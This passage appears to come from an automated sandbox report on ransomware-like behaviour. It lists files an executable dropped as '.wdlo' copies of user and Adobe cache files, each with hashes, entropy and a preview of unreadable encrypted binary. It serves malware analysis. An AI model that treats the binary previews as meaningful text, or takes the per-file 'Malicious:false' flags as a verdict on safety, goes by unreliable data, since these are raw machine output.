                  Preview:[{000.s.:.+._....[E.f:......:.....h.G`^HEP...nvV.V2...{.=.....w9..6!.'X2f.n......".Yu..:'..xb...3...X....g"3..m%u..}.$....%..:.M.._Zt]a.h.%.J....6H...-m.:Z..8.hS..0&....p....On...>U..l.V..2(q...9.r.D..N6..L...=&.]..M4...5..hv7.I{...%`.{.!'..P.GD..}..q0e3({b.`.t..U.2...Ya....xg.,i./..O..S...Y4..T..>.....v....$..\....O$.2*!.F....U...9.}ao~.?r.@..<0i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Youtube.url

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.4095113095614495
                  Encrypted:false
                  SSDEEP:12:L8dJuoUBbENPTmDP9aRhyOrj6iel2MXreN+8636Wcii9a:L89UB4AAzyOhp+rz863zbD
                  MD5:453A99919427A81AC4C6BC2F273CB24D
                  SHA1:87657B381112D90000CADFD53512F9AA55054429
                  SHA-256:33D4040FE8EC42FD3B5952C732D913F7A0605E2FB9FCFB8257982ADF1DA3B0DE
                  SHA-512:F09B95A9984BB4AB58CC3D2F2134095C99411E07107A1A528E718224E6BB3B215E5116134792B5797164534E278E232D385C2A364A863FBAB0B35F3AE77B76E3
                  Malicious:false
                  Preview:[{0003...9.`h.?...A9.:..\..........r.v@...^*....Y..{].$..cUn...v.q..4..1.E..(v.1...:...5c?=...L.}..X!0.....'.....\.q...X.......;b..>Y...e..%l4...Z......&.u4p...0....]..l.{~..._.H.....14k 0sr-=a.p.fv.O.%.P.&"X.."\P.[...(G{.X.C....t.+Vm...Mn`C%y.9i.....(v].=.a.j.M..v...e..0......!>..^Y&1&...7!..'..T..*.......J9:fG.....j.._;=U...4Q.L".Y..j6......i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Favorites\Youtube.url.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):446
                  Entropy (8bit):7.4095113095614495
                  Encrypted:false
                  SSDEEP:12:L8dJuoUBbENPTmDP9aRhyOrj6iel2MXreN+8636Wcii9a:L89UB4AAzyOhp+rz863zbD
                  MD5:453A99919427A81AC4C6BC2F273CB24D
                  SHA1:87657B381112D90000CADFD53512F9AA55054429
                  SHA-256:33D4040FE8EC42FD3B5952C732D913F7A0605E2FB9FCFB8257982ADF1DA3B0DE
                  SHA-512:F09B95A9984BB4AB58CC3D2F2134095C99411E07107A1A528E718224E6BB3B215E5116134792B5797164534E278E232D385C2A364A863FBAB0B35F3AE77B76E3
                  Malicious:false
                  Preview:[{0003...9.`h.?...A9.:..\..........r.v@...^*....Y..{].$..cUn...v.q..4..1.E..(v.1...:...5c?=...L.}..X!0.....'.....\.q...X.......;b..>Y...e..%l4...Z......&.u4p...0....]..l.{~..._.H.....14k 0sr-=a.p.fv.O.%.P.&"X.."\P.[...(G{.X.C....t.+Vm...Mn`C%y.9i.....(v].=.a.j.M..v...e..0......!>..^Y&1&...7!..'..T..*.......J9:fG.....j.._;=U...4Q.L".Y..j6......i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\.curlrc.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):7.288599291372987
                  Encrypted:false
                  SSDEEP:6:KWyMG3sAlSeXFutoLdp2YbNetBu0YjHLEHLpaObZOsVolWbz6Wcii96Z:NyMG3JVbD2YbkTOrEHks36Wcii9a
                  MD5:5FBE7A9DF37FA44FD58B83B18AA3DCAB
                  SHA1:1F7A14A9CEE594A5DDBEDFBB2537A3165C3C1E53
                  SHA-256:4533EFB5A3C7E28D286220AF0752AA9DFC2145AE3975EB47304E93FD41C1E00B
                  SHA-512:118CC5E1739A67963654514F81A7E7ACA6065ADE58C79F8DCCB6604CA00A4B7370958156F3F3406BBA9F030551B793512A010C8D837BE5CFDFBBFAE87FB3691A
                  Malicious:false
                  Preview:insecjq.O.!..d3.r.&.*..vw.c....q[.`..g.n8.OdZ...#.g.+D+..v.v.7|.c.dU..Z.p..a.. h...4..v'>p...T.f.......mp.K....B.A.....}.$..*.......Kzt..6.....][.8...>......f....>....-.. ..e........a...$...O......(e...=].7..w......S.+.<..Y.h].......)P.Y.,/.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1567
                  Entropy (8bit):7.878768810417138
                  Encrypted:false
                  SSDEEP:48:akju5F1g3swaLGe63nfBwHaoYAqPfMST3nD:akju71osNSe63nfBwLOMSX
                  MD5:B79FEE0E51B848B06E39F11AF7D9A424
                  SHA1:F6A7321A85A6E6C1CA2081A033E82461415CCF00
                  SHA-256:390BD7681ED6DE6A133EA6DA637DAAAD918148F3EDAFD251C82ECEACDC717364
                  SHA-512:D9222E673E7752CD6886BA663BA9D98984D7C1F48C18F83A5616983898A02617384032AE0BD5E71C4AD0CD2832C14F165D7A6E7E30EE33FDD6F53FB88746A9BD
                  Malicious:false
                  Preview:%!Ado....83i..<b....&H.$.6...%&../.....;7...2/#.....3..8U.{(>.r.......Hm..3/ze.,.....{..(O.Z.D......&..._...>.w':F.........{...&.RD-.IK...CA.;a2U.Aa..D^..i..I...w.Y.SU......w....V....^.OI.....ou.^.4....._...."=..zH..}X:p.2 .zSk.F..Kb.B..?E,..sK>..!y(o-..i9..<D'.......6.....Y..w\d.yD.....Wc.).x.x.Mb...wi..F.h..........ey:....3.imN..*.Hh.q.B.-....w...&...-IJ.`.....C..../..D..\..X.1.....k......L}......g...K.=.,I..|K..]..\hT.....8........n<}.......S..84E..L..E..Nc9qH6.....U|..w.'.f{(..q.;|.h']..$U.....Z..F..[.X"..b...qN..*EK.."..g..v..'4T.5G..E...,.8.,.}...s8....].g./.,........"^.$$..V[W..M.h/S/V..R=.dr....3....]...tt.;<.d.k....D.\b,uX.Q.D..y..:Zu> 4...7N.&..J.....n|M.............6.o...U......`........+$y.t.>.=K...*...e..wi.G..j.(N...!.y........L.2...u4..5x.o..S.0-.x.Y6..b:.w.'.....1.."J.O.'SI6;5al.G..!oZqK.....H.h?.?.g9..y....}..#...e.?..dLr.)..xkyH.,./...>U....}.v.#..9.(G.c.. 4...P..Q.zh.A!..qU#I.x.].P...-8+..V..h.g...]>...k...%YvC....h&....

                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt23.lst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):185433
                  Entropy (8bit):7.877368933507415
                  Encrypted:false
                  SSDEEP:3072:ejJIEi7tcSvDqqkmxwWpgUDFQCmmVfussvmrS/L2ap0X6NKYErzHaXRXE07Zman2:sIXcCDaKHL7mmVYBaaCX6NKYErz6XRX0
                  MD5:D5E3B5D23BCF63B56753325978CEF09A
                  SHA1:624322EB659F4065635D56AEFDFF384E9188F518
                  SHA-256:8A0AE44F70DECE0E8C0A780FC9021082A8011DBFE698121E5B368C2667610E5B
                  SHA-512:2A694163F4CBF1DFD10605303E4EA91FDB6C144A5841462974426CEA8F2478479CCE8AF7B92AB195603BDDF5D9ECFC7E5E658570FBA338C8C3845C047FDA0F71
                  Malicious:false
                  Preview:%!Ado[.V...:^.A....y....%.A@.[m.<7..<.8u....$....Q...V.).Xpr.....B..QF....>@...L...`..V.}7wbo{7C..Y.....3ECh....\..V...n}j..O..@x........e..j.v"U.......]..w...L.QY.w...z..\.."..m..........X.F8.N..u....3_1.............?...82..o....zh...Bh.....Co.eE..a..b..]....0..N..*..|a&@.D....F..i..o[....Q.N.,.....Q.N^h..:h..C...>5.,Q$T.f.[.DES...f.....y.[....W..N.cD=...O.H.N.^@...-....[..Y.! o...7g9.R|Gg....[..._2.p.n$....i..n.y.%.a.d?....S.65.K1...6$...yc..}...b.g.....t.>...0...k.......\ .8q..........aq...c.pQ.h0H...*g....o&O...t...5xb..x6.[.@....|..e.~.F%B-. .2......s.F...Y..<.#..N./...~..Z;.Z<k.!".!.zzu.h.,.3..9...r.)...XK.K..<.9y..ETA.S....Y.EH...*.s<...O~.n..G........*..&..........\k.:.....px..YMU^r..S..4........./z.|....'...F....{.tdV....Cm"[..F".Y.e5AP.}..x.f|+..s...V....ir|C.D.........Q.D....\.\....qL..]..7..!.y...Ee...4.....Z.D.9.....3....d.+..[..u.b....k.XT....D.. ....O..\Jt8.......&n@..~J5.....}P..".<.c.%..S..7X......^...`N...s

                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):206549
                  Entropy (8bit):7.249189482423074
                  Encrypted:false
                  SSDEEP:3072:ZsG+1BRscUn7DJeiQRmkiRNjP7brLE9oOyZ+18eHnO6IObovoWiRn1:6qn71eiXjnHE9oXarHOZObogn1
                  MD5:294A7D273021ACBAA0C6773032576B69
                  SHA1:564CAFEB82647D831FA750B357DF04D24880EA81
                  SHA-256:95ACE93D27624C09FD00DAD755F3FEFF889FC844E45F8D1C1F785BE81C55BF17
                  SHA-512:05581898381097BAE5B038A32D7268D28F939F37ED1795CC135B540FB455E75217C46ACD09D6D162A498AC2B92704CE54F5CE45C6CEA368D89A8BA47C1DEAC92
                  Malicious:false
                  Preview:Adobe.eW.^....xsp..Y%...] ..{o.......&.......K.%.k..........k..-...-.........63?..@.O....A..$..BjB`.l..0^.....nM,..Hi...y....k.^.?....#W..&V.B..[.u8........\.w.I.....W.W.m.. ...3%dt....'.`.8\....+.Ad.%..; ../.......4...J|.4..2..R&{.OJE.B../l...........w.e...q.M.0..hw.Y.f.N......WK..H.R...%!..g.g.......;...?....A.7...\.$..z.36+-......o...T..]..6p...n;$..'.+..C.......S@.D.}......+.............?.........59..7<....=.............t..H|N..E`P..[..-,.ie..4.t..% .6..'..v..L".1<...Nj2P..)p-.O..>....w..f.9.....7z.".A......../..Fn...p<......p....Rw`+x]>8....I.K*...~....:..T.[..2.v.b.F...V.....S.t.19......(..S...q...]..._....Imf.Q...y^..zF.hG./..[.c.].D.yv....=......T.K.Q.u...KJE.....vI ].......?S.1........2..j`...r....$.....a.0..G*..\k.:.t.Q..V.Yx..G...F.[a+..F.i..!9SYC.....9...hV....q...\fu.v.79.......y..>BM.z:.[.....9..4&....ZcGvB..8.W.w<..m..'..f.^..o...g..........+A..C.v.1......nJc.....:9.2.H.(1.KC$...$#.........g..FS...0Y...2..Rz....Ue.

                  C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):67060
                  Entropy (8bit):7.997509394177066
                  Encrypted:true
                  SSDEEP:1536:i3YX5n4Ad+1rdx+U+PfZi5L55kakIkE3catFFlcaBF3U6B2ehok:Rn4Ad4pr5TFkIkE3tbzFE6B6k
                  MD5:89950029B451BA79886B1D4E942B2F0B
                  SHA1:8253BC5640633CCC9BBDEC36D15DD23B1FD2F49A
                  SHA-256:A2712DC62C8D86C158D2D5A3EF86D0EA1FAFE3BD892B8AFCAFBD241FB377275F
                  SHA-512:097BC89CEA34D92417801E957358077E37172B13D4674B69CD3218D9C87BFC86F68B3837ACD10CF26A652564E200964C392150143F18EA108B69A68A20DE15B2
                  Malicious:true
                  Preview:4.397..N...H.....z..k. ..a.........XJ....Y...Jm...<.64.......?.}.].....w....7..~...Q..;Q..l^......k..v.EG]...d./B.j j....b.9..P&.V......nQ....V}..........f2(..As.I.S4mT..!L.>.>....$#&.....u...z.:,.RF...9..f....)...N...oE.:....k.a.. .j.R...$D.{...u.<=...![..b!..J5f;.B.fC.[.......O._m.W.R{X7.L.9.#.e.a..M..$i.t...B.izz.....tg....Kl.X.,C..!.fouQ/....$.Ei.....'.p.AS-5.R<<.c...f.??.....s..9....I.....C.u.I.;D..."`=S<Z1.......$b....-F.6.I8......O..]|...aH.PdDM.XcSs.......1.*...)...`..;_....1..VV....^q.uJ..M..,..;...Q....k..`@......XTT.V......>/.. ...;.........X....O.5...J..i..%.....WV.....0./<....e...\.Y....,e..''...d.v....]..f..h\...y9A.W.(.K...8P..J...u...2..^]%.p`n....Z.i..W}nsdd..5...d.+8..m..H.s.._.$.>.....,\.....Do../N.l..4...l1.........3.5..!.....c.%.B*p..\.......6.P..N2-....Y.5...gP+7[..*m.n..B)...@U$.fE....wD......$...V..X.......!....tT.*Tv......O`..d.._Ai5.e.&.2.l..7{55.Ut.^qKB..Z%.....&..E..".J.....smO.....!.......h...g....[.p{.F9.....P..

                  C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):932
                  Entropy (8bit):7.746904448389813
                  Encrypted:false
                  SSDEEP:24:kHyvqdH1IJr2Sw6eqkOoFxMM+20Q5BwJGfuNZ6kz3x3zbD:dvKSc76ezOob9+ewxl3nD
                  MD5:CE1EB0E99C37A066A8A52CE12BE2E1E5
                  SHA1:9D97A3606F14DE882B715C637A7329399E20F05D
                  SHA-256:A4F8582D2AAFC05AE1A390EB59AF30156B9D34AA8314ACE442082050F98687EC
                  SHA-512:23E04B723783C0E967C5452B7E9CB0079C9A3414F70245A02FC884292B467168EE55BFFAC30213DEB6D72E442992A31D2F578A9F8A88610E63ACD3F12876C69C
                  Malicious:false
                  Preview:CPSA.!vi..q.T...b.V.....N...AF|...*i...Z=..Y.h....C..#.M...r4<.7.a,...H....'...@..W.ht.j.R....=.EX..dx..)%..W....(.@..z.q..T..f\....'.@...J.]6]._.....D.0.S.t*.....$.7.s...rN..c.N{hZ._a..d.[.....# ..XJ....Z....3.l.'D........<[..&.K}#^|Q.r._W..{.V......}...A....:.X...?r2O...Z....+...8.........!w.v..Ud{N3|..t3..CMB..E.1.x.G..jz...OSy.P....0....1.s....'.ol>...Ni../..'.......2V.1E..m..7T...#s...M.d].s..#}X..:\h.R=.n....7....".1B.....mF.j.&..{..euT}y._Z...,=...6....'F.Z..eOp.........Uy..#$l..p....q.m.......dJ.>...Q.c.X....@y..(B&Z.+.0.Ee..jR.....8..8G.~...j..1..9.m...Ae.4.........`M..3..;..N@.4W.g.......oN"o..~hN.*...2.i..)..P..mv.?.T.D.0....XP.3..G..Y~w..HTd.Zq|.....X*.%.%...W.._...o.V"<.Ap..Ve.E...'...|R.q.W..^z. ;.......|@0...v...yN?,&..K?5.sgD1od........q9.{#......#..*....q.1.DO...@..iI_e.. ...#.<..{i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.974238121593443
                  Encrypted:false
                  SSDEEP:192:O7T1SMYmnIxg4d/jCF7Crna9H6/f5eZxzpO71cEoUHe32vwVOt69w4An4oJOPvon:idYmnI64XnaM/fMvtO71cEz0VOtBbn44
                  MD5:07AA95EBF5A563995D4EB99BAF890750
                  SHA1:2EF235606598532D2F71B5BCEBEEDFDC203AB546
                  SHA-256:5BF69B00E5D70A287C68AF1CFA2DC57E4D75B5D8E3C2FDC5D23B3539DDBBC64C
                  SHA-512:9732FFB99F260D055DF3FEC1A8EE97F2F7E419973B56B95FCEC1B10AA410B1869AC8D4C9C98A1DEFBEA21082A94465AB83B4EAC1034355EB791302962C09CFA3
                  Malicious:false
                  Preview:..$a..w...-N...h..T..xtbw..l.(.'Q.v...Y..zU...a...\c=.F..=&9...<.T....ea...*]...iX^..n.Q..|./J..3**ga..$&Wv..(.1.@...I.~Qnl...Hh....b..}.%.#...Uw..L.....Z......l.t.I..G~9DUr.....:.....p....cn*7.?.......5..e_.='.M~......u_&./.9.`..{....o.....T..,.../.}..d...Z.x..i..r....a..h...7..K].."j..h.j.z.,....E.s..C.H..?.a./..L.d..y/c.}\.U^.L......V....:.CF1.=.#e.n...S9]L.s?%...O3L.BU$.}c79e..,L.Av./LxaI0.5p..J....G..>.`..au>....v{.....i......^./.H......zDk.n.o.Ys;V>...f.J6Qy.B.#.u...P...S.\r._..$..f.P^.I%v...%..[[..!..&......../..Fz:D;.bi_O....>....|q.E9....V.Vk...q...kS..^rG.*-.Y._...%O.Pg.....K.P.........)@.....&.#I_P.|.9^;=X.\.....C..|Y|.DP.....Q.8GJ.{....~.IT.O..sp...}l.....3?S..'...&..L.vm.3....#..=..){A..x.a...k.......jH.0.....q..=...A.......92./|.*b.b.\.........U...q.n^8...n...Yc.E..QJ....0...;.E..2...WY......<.o.:..v.....MB.+.-....?...TJ..B/Bg...8Sz...y.+. ....&.V.m.G...5...:.=D<..$..b4!.1.S&.!..X.CW.;......>.......4i.\8...._o.rD..I

                  C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):1.7306592648858035
                  Encrypted:false
                  SSDEEP:6144:HGLQ4PayuInDuISYNNGpN0ZfM2g3Wg+bq4JyRROYBVftDFVZU5J3qh+AJ3TGXZAe:HGLZ6H+/huBy7
                  MD5:66FB5D6053F80BF61F0C8ACBEE58CF89
                  SHA1:AA7726DCDBDAD6B537F0222EE9E670EE92E75795
                  SHA-256:A9AAF8FF55E2158E4F42413C8FAE3C599652E41D79B5F5EAB26BCE7536854739
                  SHA-512:D09915BE2B206F1B10408742FBE064EFEE2D93C46C6D76C35433964DBF1ED2A1B81AEAEF3540F845550476C3627EEA5D3710443FCB5D22CC6C8A701E3D37D1A7
                  Malicious:false
                  Preview:6G.r..9.w..ju.yP....+...x....g.AG\...g}.....#.M..ik....{At......90.O...(...5|AE.L..w.j......."F.YT|.c.....5..8.........%..Hr.Kt.8EB...'.#.Ox..N........@T..L....1p.JC....rz.|".Lds...w..2......N......H...q$D...e.p..$./E._'c.>..P...\5.......?.#.!.i.."..G..[.!M.i]d..Of.8..3.....Il.B...t|&..xO.F..O'N..vA4.'.-`...wc.3qT.d.a..+&...Vn.....-.O.'..YD....(-jxp ..a..b..A"..zQE...v..3.:....e.)..V.h..f..i......N.k..3...vj..i....HK.A.....CY.Fz..|.U.iN.l@..p.Bg....OH...tO....j.j...kO.....}..........j.M..B......o..5\..Y...n.$.ZEj....=..A......D~ZE{..h..m.......,.....b.v4.oW.]...8.#_a.Mrd.o.3.}2Q....]....d.3T.....&fa.D.A../......t."v|....(...T....p..P.|.0_=.x...VA..e.u,..x.\/+V.QT.....53...Sc>H.W........U"&.mT.B.eT....`....|e.....".0yO...b. }.....Y.....c..o...l..R..?.O.T.......(..L%X.......A..\u............w....v0Rs.!&.!R^....{W ..P)..k.0.q.K....d...}..Ud...G.=..0.......SU....2..d...ny.2+..axA}..9..........k..r>E..T.A.D.,...s.L.....~.=$..

                  C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6704727265005384
                  Encrypted:false
                  SSDEEP:3072:lWnZ3V9gsz1wh7FrSXnNOegf3zQZFl9E2g805mkNlodSZx8KcKN5Qse:QtnOqnNef3zQZv9E/1rodsbWt
                  MD5:B732BBF9091328CCF7FB378EE681D2A1
                  SHA1:DA9C17F92C6B1E2D4B356D75BC613A8C39090D8E
                  SHA-256:3C37EABAB01571F5C073590B9F290D582DCBDB12AE2E255420F1BFA708BDAB66
                  SHA-512:BC7C0DE629C5E4CC4CD663E97CB1BABE2112486677ADDFEB306D54E499420BDC125AAF5A4514B1F4A7DC27B9F810BF2C1D1F73AE1E93F4B433CF22502EDBE6ED
                  Malicious:false
                  Preview:.....x...35.i...8Z(..4(....^O.v..A...~$F..4.z.\.2..~%m..S..................d.....w......D...)....8.o........(..h@(....Z.&^...W.I....4.W..[...0.....'....5[....K.-"...p.c....5.8.]K......F=.-.E.......Ht...Y.0i........e..i..k..._.....Y5..D....0.3..V...rG.\......H..,7.i......#...P..3s....G.......nV>=...>E:..."pY.*^E,......5FB.....$*.....i....#..L..)..0..n.g.......^e.d...Y....E.........!-..qF.}|.d/...ym.&#.aY#.&..V?L...t..".+.n...A=.6b.....y....}..K.J.8+..t....j....>.&\..m.....l.c.;..."......}...-}77.b.w..#..]#.._..l[s....Q..2.....?....N..:.|)a(.JO..2...J}.....1..hp.)....J..K.E. ....q<.R.[a.cF.o......$....gI.xqrh.<:\.K...W.D.G..;]D..."V..QDCI....t.......(.......).#2Y.~o~.P.q>j6}B.oq.`..T,.S.6Q.$.9....J..`L..a;A..h3P`....A...+~#G..u]h......A.3.DU...st.e.....!w..93.s.`.wy:...k.*.1.Q.~.j....Q=X.J%..~i.$<.+.o.e..7.....H-..RJg..T....i^.t{...3.Za..rB.....#..{...$...p.CW.k..G./.!p.....-...$.`..1..y......<.P.9...bK..8......t.^.v\.*?..6.ZZ3..I.........

                  C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.67064209232043
                  Encrypted:false
                  SSDEEP:3072:MsN9l9uZyOFxfgofAtTZtemG6dsu7hD3XvIuztmaVouFSyYsYXHqE+GwRb:LMRfsTZj1Dn3teaeDu
                  MD5:14E571A6EC9D2ACCFA01C454CC1E216D
                  SHA1:7FFFF0FC864A1DBA559BEAF1DE8BD33D7C45FA18
                  SHA-256:E8699773E0811B23E51189A411C19AC10104BEE901495B7D6B786E1D6B25CF33
                  SHA-512:486D93A083A36758B3297FCEAE26BF8B810D9824294ECA04D90CFE8AA87C0755A1FD8D4635DC9B45FA8A8BCE14F98A6B0EC7073E94170A84241740F54997518B
                  Malicious:false
                  Preview:........L.........8...r...9m.Xj...^.4......;{..{N<v...j..r....wV..7.._.t`.....>@.mTN...b..X.Q.._..j.r...ZdQ.".O-.....b .V.V3.t..nt.Cd...O......X...UW.......aC~G.6.'..q..A.0&..oZ:..w.....#..L..d.f&G-.w..4.........,J:.@..o...1...X..j\._H.oU}....d........P~.....7..>........s{..!..Y+...^.B(.U?D.(..W.*..F..[.....<neo.|..e.c.(T......*`.t.h.r.o...sW.z`..3.2s......+....R..k.5_.1.*.CF..A..v[.T......../x$...p.f.W.7.J....B]r....N....i.;.h+8N..p......e\3*=...Drp|.....W.G.Of..j........L)..r..A...Z.V...At'8.......g......}.I..Tf..|.x...~t.N..j.F..?..=~^e."p.T.f..{..9...c...E..:^\aLw1..s...a.d.."s..\S.0h..h...a..$....p.5.xy.+.....$.T.}.hG5..ws..y.t.yO@.S...I..|3J.'y.U..1..K... ..L}...Y.3...f2....l.+..w.ta...[Hk......l+........b....|...{{....3..~9....2...Gq.+.|.b}...Z..O..HW.Ed.d.@....I..(rV...M..A.4.m...%C..v..\H.N.u.w.a.;....3..5.x.................5....l..-x}[`.....>...O)m.o.fA..........~.f....2.....{..+.2...i!xd....a.i..+..=.6:U-&.O......}<..S..

                  C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6706290264994352
                  Encrypted:false
                  SSDEEP:3072:uo1o04OrOkHTq15mvyFpd/2U9liykdCrUFoVSIWi6Fnj/wQBZFi:5+0frG15WCr3VSIWPnbBZ4
                  MD5:DCF2E495B3E3AB79D9D9A6AD875B7621
                  SHA1:8656C28DBF788C09C46EDAABE4933BBF871B2FFC
                  SHA-256:1978CFAD0F60A1D47489B2C6C0FB4675FEBFE240BAEF7A794C01B330883D0571
                  SHA-512:82AA2EAB977D6BA60C55294E36C82D9AF62121F092950F64BE1F5145767BA269BC63FF59D6EF6A662A6E87CCD4E4CB471E637E65B15684835F1A09C9442AAE93
                  Malicious:false
                  Preview:.....S.....O....>.#..Z.".9.../...h.......7p.......(.!.?,..Mp..;..x...M\u..X.KAu.)..BL#..... .BuY.8...}...q.uh2o.x.D..4.\...$./ j~M.aL..z....t...zz.O......-.3.0.1..M..]*;.......}_A.w...?....W.TN.............H*.=>.......*_.;ZR8........%&....I4?....o...9.,.f..:...r...B....r.s.\...k.a.0......=r..+...m.w.*..A...e.&P.'.P(.....J..0...Ex.....b..V.;.y.....7..].D..;Hf.CQsw.t..-.....C.s.....U......P.bx..A...(". ..M.W.]..Ag!.#..+......E...d.............e...o.../..(....m....QG.xV....g......d..{..QA.Rl.x.S8...c..X.9.oXb..G...AU........FX.......?8.}..q.M`..G....y.jP..W.R........d....@%.Y...+.6'8=.......0.m`;....XD..'.../H.".MU$U..a...K. ..+Y.......C..h..eP.:....V..hW..t......2.}f..../B.L...,.....G.m>*v.L..z;y..5....'L.&..(h.u`.i.......5(/u$..s.#..V..G..P".81 Lj../.Z~.....A..C`.....Lm..i..z.:.~......m.&.]....Q...~...1._.[.J....*.sLM.gV..Fn.Ge)..6f.s.M.{..)3bU X..........N.Y..Q`+.SH}...F./jq,Fb.h..'.\.,..g.. .CS.9m.>...7H....m..#).....WQ+..DY..=N..bO.v.

                  C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.9877156704258425
                  Encrypted:false
                  SSDEEP:384:z651V90UWPNxRmf8QFlMLMBKRhQaQX4nBmbqdtzkoU8wcN8wSNP:+zpWPZP+lYMBJDsmqtQ8tNB6P
                  MD5:C995C7C1D580B41982DBA09275F0AADF
                  SHA1:0DE0DA2B8EDDB8A41136A0999F4B0399BEC5DE5C
                  SHA-256:376838EAB21029D3E7782EFF62B245682E15AA5DF7798B9801F0B57790F4F8E1
                  SHA-512:48C2B0553B9862510BABBB527DDDE64947A9D92CCC4F29EEEACCC39B080159022490604B39E8D122075DB3F56ACC4CA3EF9397E4BE6759D305A5A9263409399A
                  Malicious:false
                  Preview:e.X....dY..m......!.sa.....H..k/...^..Y;2.(7A...c.t..E!....L.45....Y.......5M.r.GO.....-K...D..@.'-....Jb.,B.P)?.H...L..=........./^...7.S.....,:..& ...OSa......w$.....[..k5C'.g.v..\.F..N...*=$\.l.:....$.,..Q...<p.c..l.i|.1.......~a@*......[....0K...I<|...m.L...|.C...ns1.U..@..`..j........3v.9.;`...Q{.........V.k].}.k..1...A..`>;.:..x..'L....M/..d.@DO........o}..@...g..J._.D.E1....S~>..;W8.),....L.GJw..b.....n..v4.0....v.Ok...z.I..]..E.....@1....M-....!....i.H...I.|......MW..../......E.......;....EF..u.!...,.w.....*-......k....3.7...M.}......3.g....S..x~.h....F..@......<^.&V.t......lI.P.....mY`....z..7...m..N.N.....{u.!H.y.(..l...c:........<.....L.....rux.\.1{..p.....d..J.s...M...FZxF...Vq!...Z.]....#...9.{A6........Pl.t....v.O....u:.U...!:.....M,...5ulQ..KB`$.x....j.S.h..=.d....m...8..c......9.d..D.t...6. .{..*..;.Z-.....>......=.9.`.~..41....l....._.i.K.[..q.Jo..t.[.......q.......[...#ao..Jd.R.......H.M*.gP....r.6..!.K...)^.p.

                  C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6291790
                  Entropy (8bit):0.440607912376939
                  Encrypted:false
